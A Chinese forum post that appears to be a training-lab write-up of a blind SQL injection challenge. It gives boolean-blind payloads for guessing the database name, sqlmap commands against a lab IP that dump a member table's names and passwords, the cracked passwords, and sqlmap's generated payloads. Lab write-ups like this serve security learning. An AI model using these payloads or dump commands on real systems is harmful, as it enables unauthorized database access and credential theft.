多测师

 找回密码
 立即注册
搜索
热搜: 活动 交友 discuz
查看: 334|回复: 1

WEB_SQL注入_2

[复制链接]

24

主题

29

帖子

151

积分

注册会员

Rank: 2

积分
151
发表于 2019-7-16 16:35:34 | 显示全部楼层 |阅读模式
本帖最后由 Linlin 于 2019-7-16 17:52 编辑

一、题目:
     https://www.mozhe.cn/bug/detail/UDNpU0gwcUhXTUFvQm9HRVdOTmNTdz09bW96aGUmozhe
   

二、思路:
    1、无回显,布尔值注入
    2、瞎J8找注入点
    3、猜库,猜表,猜字段,猜值

三、测试:
    1、抓包修改账号和密码尝试注入失败
    2、发现页面中有一个停机公告,查看HTML中代码找到公告链接


    3、从公告页面找注入点,id=1.0    id=1.01
        发现注入点


     4、猜库长度
        id=1 and length(database()) > 10
        F
        id=1 and length(database()) > 9
        T

    5、枚举第一个字母
        id=1 and ascii(substr(database(),1,1))>100
        T
        id=1 and ascii(substr(database(),1,1))>200
        F

        id=1 and ascii(substr(database(),1,1))=116
        F
        id=1 and ascii(substr(database(),1,1))=115
        T

        第一个字母ASCII=115

    6、枚举后字母
        第二个字母ASCII=116
        第三个字母ASCII=111
        第四个字母ASCII=114
        第五个字母ASCII=109
        第六个字母ASCII=103
        第七个字母ASCII=114
        第八个字母ASCII=111
        第九个字母ASCII=117
        第十个字母ASCII=120

    7、得到数据库名
        stormgroup

    8、接着枚举表名、字段名、值
        哎,到这里没有耐心了

    9、上SQLMAP
        sqlmap -u "http://219.153.49.228:49185/new_list.php?id=1"
        除了布尔值还存在延时注入
      
         

    10、暴库暴表暴字段
        sqlmap -u "http://219.153.49.228:49185/new_list.php?id=1" --dbs
        验证手动枚举库名是否准确
      
        sqlmap -u "http://219.153.49.228:49185/new_list.php?id=1" --tables -D stormgroup
        sqlmap -u "http://219.153.49.228:49185/new_list.php?id=1" --colums -D stormgroup -T member
        sqlmap -u "http://219.153.49.228:49185/new_list.php?id=1" --dump -D stormgroup -T member -C "name,password"
      
        拿到密码MD5一下
        528469
        205593


    11、尝试登录
        第一个用户名和密码
        
        第二个密码登录成功
        


    12、交卷
      

四、总结

    1、一开始由于是个登录页面,一直在用户名和密码处找注入点,尝试了好久,一方面是没有认真审题,另一方面是确实思维被固化了,如果实在实际渗透过程中,更不应该纠结于一点,如果一个地方找不到突破口,应该从其他地方找。

    2、工具永远只是辅助自己的手段,一定要在学习过程中,真正理解了,再去用工具,即使是使用工具爆破出来了,也应该知道工具是用了什么语句去爆破出来,如果有足够的时间,没有工具,自己是不是还是可以手工爆破呢。

    3、使用SQLMAP扫描的出来的结果,payload如下:
        --tables:
        1 AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x73746f726d67726f7570 LIMIT 1,1),7,1))>1

        --columns:
        1 AND ORD(MID((SELECT IFNULL(CAST(column_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6d656d626572 AND table_schema=0x73746f726d67726f7570 LIMIT 0,1),5,1))>1
        1 AND ORD(MID((SELECT IFNULL(CAST(column_type AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6d656d626572 AND column_name=0x6e616d65 AND table_schema=0x73746f726d67726f7570),1,1))>64


KikuBruce

19/7/16


本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

14

主题

22

帖子

82

积分

禁止访问

积分
82
发表于 2020-7-20 18:26:17 | 显示全部楼层
提示: 作者被禁止或删除 内容自动屏蔽
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

QQ|多测师软件培训|Archiver|手机版|小黑屋|duoceshi Inc. ( 16058051 )

GMT+8, 2020-10-24 23:00 , Processed in 0.098125 second(s), 21 queries .

Powered by Discuz! X3.2 Licensed

© 2001-2013 Comsenz Inc.

快速回复 返回顶部 返回列表